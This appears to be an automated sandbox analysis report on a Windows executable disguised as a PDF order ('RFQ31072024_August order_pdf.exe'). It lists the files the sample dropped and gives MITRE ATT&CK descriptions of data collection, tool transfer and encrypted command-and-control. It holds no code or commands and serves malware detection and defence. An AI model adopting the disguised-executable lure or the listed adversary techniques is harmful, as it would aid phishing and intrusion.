C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ31072024_August order_pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kskdkaeb.mnv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxyrwcch.iwt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq1w145s.2do.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsys44by.ytp.ps1

C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp

C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp

C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe:Zone.Identifier

Windows Analysis Report
RFQ31072024_August order_pdf.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre